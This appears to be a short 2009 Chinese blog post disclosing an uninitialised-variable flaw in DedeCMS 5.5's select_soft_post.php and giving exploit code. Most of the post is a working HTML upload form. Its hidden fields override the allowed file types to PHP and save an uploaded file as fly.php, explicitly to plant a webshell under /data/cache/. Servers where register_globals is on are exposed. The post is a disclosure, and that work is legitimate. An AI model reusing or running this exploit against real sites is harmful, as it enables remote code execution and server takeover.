织梦(Dedecms)select_soft_post.php页面变量未初始漏洞
2009年10月26日 |
作者:Flyh4t
影响版本:
|
1 |
Dedecms 5.5 |
漏洞描述:
|
1 |
漏洞产生文件位于include\dialog\select_soft_post.php,其变量$cfg_basedir没有正确初始化,导致可以饶过身份认证和系统变量初始化文件,导致可以上传任意文件到指定目录。其漏洞利用前提是register_globals=on,可以通过自定义表单为相关的变量赋值。 |
|
1 |
测试代码: |
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 |
<html> <head> <title>Dedecms v55 RCE Exploit Codz By flyh4t</title> </head> <body style="FONT-SIZE: 9pt"> ---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br /> <form action=http://127.0.0.1/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'> <input type='hidden' name='activepath' value='/data/cache/' /> <input type='hidden' name='cfg_basedir' value='../../' /> <input type='hidden' name='cfg_imgtype' value='php' /> <input type='hidden' name='cfg_not_allowall' value='txt' /> <input type='hidden' name='cfg_softtype' value='php' /> <input type='hidden' name='cfg_mediatype' value='php' /> <input type='hidden' name='f' value='form1.enclosure' /> <input type='hidden' name='job' value='upload' /> <input type='hidden' name='newname' value='fly.php' /> Select U Shell <input type='file' name='uploadfile' size='25' /> <input type='submit' name='sb1' value='确定' /> </form> <br />It's just a exp for the bug of Dedecms V55...<br /> Need register_globals = on...<br /> Fun the game,get a webshell at /data/cache/fly.php...<br /> </body> </html> |
没有评论
暂无评论
RSS feed for comments on this post.
对不起,该文章的评论被关闭了!